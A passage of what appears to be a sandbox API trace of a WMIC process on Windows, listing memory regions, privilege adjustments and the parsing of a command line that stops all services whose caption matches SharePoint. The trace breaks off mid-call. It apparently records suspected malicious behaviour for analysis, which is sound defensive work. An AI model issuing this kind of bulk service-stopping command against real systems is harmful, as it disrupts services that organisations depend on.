Region: id = 3032 start_va = 0x1070000 end_va = 0x10affff entry_point = 0x0 region_type = private name = "private_0x0000000001070000" filename = "" Region: id = 3033 start_va = 0x10b0000 end_va = 0x10effff entry_point = 0x0 region_type = private name = "private_0x00000000010b0000" filename = "" Region: id = 3034 start_va = 0x7ecaa000 end_va = 0x7ecacfff entry_point = 0x0 region_type = private name = "private_0x000000007ecaa000" filename = "" Region: id = 3035 start_va = 0x7ecad000 end_va = 0x7ecaffff entry_point = 0x0 region_type = private name = "private_0x000000007ecad000" filename = "" Region: id = 3036 start_va = 0x7edd5000 end_va = 0x7edd7fff entry_point = 0x0 region_type = private name = "private_0x000000007edd5000" filename = "" Region: id = 3037 start_va = 0x741a0000 end_va = 0x741b0fff entry_point = 0x741a0000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 3038 start_va = 0x740e0000 end_va = 0x7419bfff entry_point = 0x740e0000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 3039 start_va = 0x580000 end_va = 0x594fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 3040 start_va = 0x580000 end_va = 0x594fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 3041 start_va = 0x5b0000 end_va = 0x5d8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Thread: id = 220 os_tid = 0xe38 [0111.398] GetModuleHandleA (lpModuleName=0x0) returned 0x1300000 [0111.398] __set_app_type (_Type=0x1) [0111.398] __p__fmode () returned 0x77ac4d6c [0111.398] __p__commode () returned 0x77ac5b1c [0111.398] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x133aa90) returned 0x0 [0111.398] __wgetmainargs (in: _Argc=0x13491a8, _Argv=0x13491ac, _Env=0x13491b0, _DoWildCard=0, _StartInfo=0x13491bc | out: _Argc=0x13491a8, _Argv=0x13491ac, _Env=0x13491b0) returned 0 [0111.398] ??0CHString@@QAE@XZ () returned 0x13495ec [0111.398] ??0CHString@@QAE@XZ () returned 0x13498fc [0111.398] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0111.398] SetConsoleCtrlHandler (HandlerRoutine=0x1334980, Add=1) returned 1 [0111.398] _onexit (_Func=0x1340a20) returned 0x1340a20 [0111.399] _onexit (_Func=0x1340a30) returned 0x1340a30 [0111.399] _onexit (_Func=0x1340a50) returned 0x1340a50 [0111.399] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0111.399] ResolveDelayLoadedAPI () returned 0x770fcd50 [0111.399] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0111.401] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0111.406] CoCreateInstance (in: rclsid=0x1306a1c*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x1306a2c*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x1349510 | out: ppv=0x1349510*=0x2f8050) returned 0x0 [0111.417] GetCurrentProcess () returned 0xffffffff [0111.417] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x26fa14 | out: TokenHandle=0x26fa14*=0x158) returned 1 [0111.417] GetTokenInformation (in: TokenHandle=0x158, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x26fa10 | out: TokenInformation=0x0, ReturnLength=0x26fa10) returned 0 [0111.417] GetTokenInformation (in: TokenHandle=0x158, TokenInformationClass=0x3, TokenInformation=0x693a08, TokenInformationLength=0x118, ReturnLength=0x26fa10 | out: TokenInformation=0x693a08, ReturnLength=0x26fa10) returned 1 [0111.417] AdjustTokenPrivileges (in: TokenHandle=0x158, DisableAllPrivileges=0, NewState=0x693a08*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0111.417] CloseHandle (hObject=0x158) returned 1 [0111.417] SetThreadUILanguage (LangId=0x0) returned 0x409 [0111.419] _vsnwprintf (in: _Buffer=0x693a98, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x26f99c | out: _Buffer="ms_409") returned 6 [0111.419] GetComputerNameW (in: lpBuffer=0x693ae0, nSize=0x26fa00 | out: lpBuffer="LHNIWSJ", nSize=0x26fa00) returned 1 [0111.419] lstrlenW (lpString="LHNIWSJ") returned 7 [0111.419] lstrlenW (lpString="LHNIWSJ") returned 7 [0111.419] ResolveDelayLoadedAPI () returned 0x74d5c5f0 [0111.419] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x26fa14 | out: lpNameBuffer=0x0, nSize=0x26fa14) returned 0x0 [0111.420] GetLastError () returned 0xea [0111.420] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x693b20, nSize=0x26fa14 | out: lpNameBuffer="LHNIWSJ\\CIiHmnxMn6Ps", nSize=0x26fa14) returned 0x1 [0111.421] lstrlenW (lpString="") returned 0 [0111.421] lstrlenW (lpString="LHNIWSJ") returned 7 [0111.421] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="", cchCount2=0) returned 3 [0111.422] lstrlenW (lpString=".") returned 1 [0111.422] lstrlenW (lpString="LHNIWSJ") returned 7 [0111.422] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2=".", cchCount2=1) returned 3 [0111.422] lstrlenW (lpString="LOCALHOST") returned 9 [0111.422] lstrlenW (lpString="LHNIWSJ") returned 7 [0111.422] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="LOCALHOST", cchCount2=9) returned 1 [0111.422] lstrlenW (lpString="LHNIWSJ") returned 7 [0111.422] lstrlenW (lpString="LHNIWSJ") returned 7 [0111.422] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="LHNIWSJ", cchCount2=7) returned 2 [0111.422] lstrlenW (lpString="LHNIWSJ") returned 7 [0111.422] lstrlenW (lpString="LHNIWSJ") returned 7 [0111.422] lstrlenW (lpString="LHNIWSJ") returned 7 [0111.422] lstrlenW (lpString="LHNIWSJ") returned 7 [0111.422] ResolveDelayLoadedAPI () returned 0x77bb9840 [0111.424] SysStringLen (param_1="IDENTIFY") returned 0x8 [0111.424] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0111.424] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0111.424] SysStringLen (param_1="IDENTIFY") returned 0x8 [0111.425] SysStringLen (param_1="IMPERSONATE") returned 0xb [0111.425] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0111.425] SysStringLen (param_1="IMPERSONATE") returned 0xb [0111.425] SysStringLen (param_1="IDENTIFY") returned 0x8 [0111.425] SysStringLen (param_1="IDENTIFY") returned 0x8 [0111.425] SysStringLen (param_1="IMPERSONATE") returned 0xb [0111.425] SysStringLen (param_1="DELEGATE") returned 0x8 [0111.425] SysStringLen (param_1="IDENTIFY") returned 0x8 [0111.425] SysStringLen (param_1="DELEGATE") returned 0x8 [0111.425] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0111.425] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0111.425] SysStringLen (param_1="DELEGATE") returned 0x8 [0111.425] SysStringLen (param_1="NONE") returned 0x4 [0111.425] SysStringLen (param_1="DEFAULT") returned 0x7 [0111.425] SysStringLen (param_1="DEFAULT") returned 0x7 [0111.425] SysStringLen (param_1="NONE") returned 0x4 [0111.425] SysStringLen (param_1="CONNECT") returned 0x7 [0111.425] SysStringLen (param_1="DEFAULT") returned 0x7 [0111.426] SysStringLen (param_1="CALL") returned 0x4 [0111.426] SysStringLen (param_1="DEFAULT") returned 0x7 [0111.426] SysStringLen (param_1="CALL") returned 0x4 [0111.426] SysStringLen (param_1="CONNECT") returned 0x7 [0111.426] SysStringLen (param_1="PKT") returned 0x3 [0111.426] SysStringLen (param_1="DEFAULT") returned 0x7 [0111.426] SysStringLen (param_1="PKT") returned 0x3 [0111.426] SysStringLen (param_1="NONE") returned 0x4 [0111.426] SysStringLen (param_1="NONE") returned 0x4 [0111.426] SysStringLen (param_1="PKT") returned 0x3 [0111.426] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0111.426] SysStringLen (param_1="DEFAULT") returned 0x7 [0111.426] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0111.426] SysStringLen (param_1="NONE") returned 0x4 [0111.426] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0111.426] SysStringLen (param_1="PKT") returned 0x3 [0111.426] SysStringLen (param_1="PKT") returned 0x3 [0111.426] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0111.426] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0111.426] SysStringLen (param_1="DEFAULT") returned 0x7 [0111.426] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0111.426] SysStringLen (param_1="PKT") returned 0x3 [0111.426] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0111.426] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0111.426] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0111.426] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0111.426] GetSystemDirectoryW (in: lpBuffer=0x6929d8, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0111.427] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0111.427] SysStringLen (param_1="\\wbem\\") returned 0x6 [0111.427] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0111.427] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0111.427] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0111.427] GetCurrentThreadId () returned 0xe38 [0111.427] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x26f524 | out: phkResult=0x26f524*=0x164) returned 0x0 [0111.427] RegQueryValueExW (in: hKey=0x164, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x26f530, lpcbData=0x26f52c*=0x400 | out: lpType=0x0, lpData=0x26f530*=0x30, lpcbData=0x26f52c*=0x4) returned 0x0 [0111.427] _wcsicmp (_String1="0", _String2="1") returned -1 [0111.427] _wcsicmp (_String1="0", _String2="2") returned -2 [0111.427] RegQueryValueExW (in: hKey=0x164, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x26f52c*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x26f52c*=0x42) returned 0x0 [0111.427] RegQueryValueExW (in: hKey=0x164, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x692be0, lpcbData=0x26f52c*=0x42 | out: lpType=0x0, lpData=0x692be0*=0x25, lpcbData=0x26f52c*=0x42) returned 0x0 [0111.428] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0111.428] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0111.428] RegQueryValueExW (in: hKey=0x164, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x26f530, lpcbData=0x26f52c*=0x400 | out: lpType=0x0, lpData=0x26f530*=0x36, lpcbData=0x26f52c*=0xc) returned 0x0 [0111.428] _wtol (_String="65536") returned 65536 [0111.428] RegCloseKey (hKey=0x0) returned 0x6 [0111.428] CoCreateInstance (in: rclsid=0x1306a7c*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x1306a8c*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x26f9c4 | out: ppv=0x26f9c4*=0xb845a8) returned 0x0 [0111.440] FreeThreadedDOMDocument:IXMLDOMDocument:Load (in: This=0xb845a8, xmlSource=0x26f944*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x0), isSuccessful=0x26f9a8 | out: isSuccessful=0x26f9a8*=0xffff) returned 0x0 [0111.492] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0xb845a8, DOMElement=0x26f9bc | out: DOMElement=0x26f9bc) returned 0x0 [0111.494] SysStringLen (param_1="VALUE") returned 0x5 [0111.494] SysStringLen (param_1="TABLE") returned 0x5 [0111.494] SysStringLen (param_1="TABLE") returned 0x5 [0111.494] SysStringLen (param_1="VALUE") returned 0x5 [0111.494] SysStringLen (param_1="LIST") returned 0x4 [0111.494] SysStringLen (param_1="TABLE") returned 0x5 [0111.495] SysStringLen (param_1="RAWXML") returned 0x6 [0111.495] SysStringLen (param_1="TABLE") returned 0x5 [0111.495] SysStringLen (param_1="RAWXML") returned 0x6 [0111.495] SysStringLen (param_1="LIST") returned 0x4 [0111.495] SysStringLen (param_1="LIST") returned 0x4 [0111.495] SysStringLen (param_1="RAWXML") returned 0x6 [0111.496] SysStringLen (param_1="HTABLE") returned 0x6 [0111.496] SysStringLen (param_1="TABLE") returned 0x5 [0111.496] SysStringLen (param_1="HTABLE") returned 0x6 [0111.496] SysStringLen (param_1="LIST") returned 0x4 [0111.496] SysStringLen (param_1="HFORM") returned 0x5 [0111.496] SysStringLen (param_1="TABLE") returned 0x5 [0111.496] SysStringLen (param_1="HFORM") returned 0x5 [0111.496] SysStringLen (param_1="LIST") returned 0x4 [0111.496] SysStringLen (param_1="HFORM") returned 0x5 [0111.496] SysStringLen (param_1="HTABLE") returned 0x6 [0111.497] SysStringLen (param_1="XML") returned 0x3 [0111.497] SysStringLen (param_1="TABLE") returned 0x5 [0111.497] SysStringLen (param_1="XML") returned 0x3 [0111.497] SysStringLen (param_1="VALUE") returned 0x5 [0111.497] SysStringLen (param_1="VALUE") returned 0x5 [0111.497] SysStringLen (param_1="XML") returned 0x3 [0111.497] SysStringLen (param_1="MOF") returned 0x3 [0111.498] SysStringLen (param_1="TABLE") returned 0x5 [0111.498] SysStringLen (param_1="MOF") returned 0x3 [0111.498] SysStringLen (param_1="LIST") returned 0x4 [0111.498] SysStringLen (param_1="MOF") returned 0x3 [0111.498] SysStringLen (param_1="RAWXML") returned 0x6 [0111.498] SysStringLen (param_1="LIST") returned 0x4 [0111.498] SysStringLen (param_1="MOF") returned 0x3 [0111.498] SysStringLen (param_1="CSV") returned 0x3 [0111.498] SysStringLen (param_1="TABLE") returned 0x5 [0111.498] SysStringLen (param_1="CSV") returned 0x3 [0111.498] SysStringLen (param_1="LIST") returned 0x4 [0111.498] SysStringLen (param_1="CSV") returned 0x3 [0111.498] SysStringLen (param_1="HTABLE") returned 0x6 [0111.498] SysStringLen (param_1="CSV") returned 0x3 [0111.498] SysStringLen (param_1="HFORM") returned 0x5 [0111.499] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0111.499] SysStringLen (param_1="TABLE") returned 0x5 [0111.499] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0111.499] SysStringLen (param_1="VALUE") returned 0x5 [0111.499] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0111.499] SysStringLen (param_1="XML") returned 0x3 [0111.499] SysStringLen (param_1="XML") returned 0x3 [0111.499] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0111.500] SysStringLen (param_1="texttablewsys") returned 0xd [0111.500] SysStringLen (param_1="TABLE") returned 0x5 [0111.500] SysStringLen (param_1="texttablewsys") returned 0xd [0111.500] SysStringLen (param_1="XML") returned 0x3 [0111.500] SysStringLen (param_1="texttablewsys") returned 0xd [0111.500] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0111.500] SysStringLen (param_1="XML") returned 0x3 [0111.500] SysStringLen (param_1="texttablewsys") returned 0xd [0111.500] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0111.500] SysStringLen (param_1="TABLE") returned 0x5 [0111.500] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0111.500] SysStringLen (param_1="XML") returned 0x3 [0111.500] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0111.500] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0111.500] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0111.501] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0111.501] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0111.501] SysStringLen (param_1="TABLE") returned 0x5 [0111.501] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0111.501] SysStringLen (param_1="XML") returned 0x3 [0111.501] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0111.501] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0111.501] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0111.501] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0111.501] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0111.501] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0111.502] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0111.502] SysStringLen (param_1="TABLE") returned 0x5 [0111.503] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0111.503] SysStringLen (param_1="XML") returned 0x3 [0111.503] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0111.503] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0111.503] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0111.503] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0111.503] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0111.503] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0111.503] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0111.503] SysStringLen (param_1="TABLE") returned 0x5 [0111.503] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0111.503] SysStringLen (param_1="XML") returned 0x3 [0111.503] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0111.503] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0111.504] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0111.504] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0111.504] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0111.504] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0111.504] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0111.504] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0111.504] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0111.504] SysStringLen (param_1="TABLE") returned 0x5 [0111.504] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0111.504] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0111.504] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0111.504] SysStringLen (param_1="XML") returned 0x3 [0111.504] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0111.504] SysStringLen (param_1="texttablewsys") returned 0xd [0111.504] SysStringLen (param_1="XML") returned 0x3 [0111.504] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0111.505] SysStringLen (param_1="htable-sortby") returned 0xd [0111.505] SysStringLen (param_1="TABLE") returned 0x5 [0111.505] SysStringLen (param_1="htable-sortby") returned 0xd [0111.505] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0111.505] SysStringLen (param_1="htable-sortby") returned 0xd [0111.505] SysStringLen (param_1="XML") returned 0x3 [0111.505] SysStringLen (param_1="htable-sortby") returned 0xd [0111.505] SysStringLen (param_1="texttablewsys") returned 0xd [0111.505] SysStringLen (param_1="htable-sortby") returned 0xd [0111.505] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0111.505] SysStringLen (param_1="XML") returned 0x3 [0111.505] SysStringLen (param_1="htable-sortby") returned 0xd [0111.506] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0111.506] SysStringLen (param_1="TABLE") returned 0x5 [0111.506] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0111.506] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0111.506] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0111.506] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0111.506] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0111.506] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0111.506] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0111.506] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0111.506] SysStringLen (param_1="wmiclimofformat") returned 0xf [0111.506] SysStringLen (param_1="TABLE") returned 0x5 [0111.506] SysStringLen (param_1="wmiclimofformat") returned 0xf [0111.506] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0111.506] SysStringLen (param_1="wmiclimofformat") returned 0xf [0111.506] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0111.506] SysStringLen (param_1="wmiclimofformat") returned 0xf [0111.506] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0111.506] SysStringLen (param_1="wmiclimofformat") returned 0xf [0111.507] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0111.507] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0111.507] SysStringLen (param_1="wmiclimofformat") returned 0xf [0111.507] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0111.507] SysStringLen (param_1="TABLE") returned 0x5 [0111.507] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0111.507] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0111.507] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0111.507] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0111.507] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0111.507] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0111.507] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0111.507] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0111.508] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0111.508] SysStringLen (param_1="TABLE") returned 0x5 [0111.508] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0111.508] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0111.508] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0111.508] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0111.508] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0111.508] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0111.508] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0111.508] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0111.508] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0111.508] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0111.508] FreeThreadedDOMDocument:IUnknown:Release (This=0xb845a8) returned 0x0 [0111.508] GetCommandLineW () returned="WMIC SERVICE WHERE 'caption LIKE '%SharePoint%'' CALL STOPSERVICE" [0111.509] memcpy_s (in: _Destination=0x698040, _DestinationSize=0x8e, _Source=0x2f1588, _SourceSize=0x84 | out: _Destination=0x698040) returned 0x0 [0111.509] GetLocalTime (in: lpSystemTime=0x26f96c | out: lpSystemTime=0x26f96c*(wYear=0x7e2, wMonth=0x4, wDayOfWeek=0x0, wDay=0xf, wHour=0xa, wMinute=0x9, wSecond=0x4, wMilliseconds=0x172)) [0111.509] _vsnwprintf (in: _Buffer=0x6980d8, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x26f94c | out: _Buffer="04-15-2018T10:09:04") returned 19 [0111.509] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%SharePoint%'' CALL STOPSERVICE") returned 62 [0111.509] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%SharePoint%'' CALL STOPSERVICE") returned 62 [0111.509] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%SharePoint%'' CALL STOPSERVICE") returned 62 [0111.509] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%SharePoint%'' CALL STOPSERVICE") returned 62 [0111.509] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%SharePoint%'' CALL STOPSERVICE") returned 62 [0111.509] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%SharePoint%'' CALL STOPSERVICE") returned 62 [0111.509] lstrlenW (lpString="SERVICE") returned 7 [0111.509] _wcsicmp (_String1="SERVICE", _String2="\"NULL\"") returned 81 [0111.509] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%SharePoint%'' CALL STOPSERVICE") returned 62 [0111.509] lstrlenW (lpString="WHERE") returned 5 [0111.509] _wcsicmp (_String1="WHERE", _String2="\"NULL\"") returned 85 [0111.509] memmove_s (in: _Destination=0x692c78, _DestinationSize=0x4, _Source=0x692c68, _SourceSize=0x4 | out: _Destination=0x692c78) returned 0x0 [0111.509] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%SharePoint%'' CALL STOPSERVICE") returned 62 [0111.509] lstrlenW (lpString="'caption LIKE '%SharePoint%''") returned 29 [0111.509] _wcsicmp (_String1="'caption LIKE '%SharePoint%''", _String2="\"NULL\"") returned 5 [0111.509] lstrlenW (lpString="'caption LIKE '%SharePoint%''") returned 29 [0111.510] lstrlenW (lpString="'caption LIKE '%SharePoint%''") returned 29 [0111.510] memmove_s (in: _Destination=0x697db8, _DestinationSize=0x8, _Source=0x692c78, _SourceSize=0x8 | out: _Destination=0x697db8) returned 0x0 [0111.510] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%SharePoint%'' CALL STOPSERVICE") returned 62 [0111.510] lstrlenW (lpString="CALL") returned 4 [0111.510] _wcsicmp (_String1="CALL", _String2="\"NULL\"") returned 65 [0111.510] memmove_s (in: _Destination=0x697fe0, _DestinationSize=0xc, _Source=0x697db8, _SourceSize=0xc | out: _Destination=0x697fe0) returned 0x0 [0111.510] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%SharePoint%'' CALL STOPSERVICE") returned 62 [0111.510] lstrlenW (lpString="STOPSERVICE") returned 11 [0111.510] _wcsicmp (_String1="STOPSERVICE", _String2="\"NULL\"") returned 81 [0111.510] memmove_s (in: _Destination=0x6922b8, _DestinationSize=0x10, _Source=0x697fe0, _SourceSize=0x10 | out: _Destination=0x6922b8) returned 0x0 [0111.510] lstrlenW (lpString="QUIT") returned 4 [0111.510] lstrlenW (lpString="SERVICE") returned 7 [0111.510] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="QUIT", cchCount2=4) returned 3 [0111.510] lstrlenW 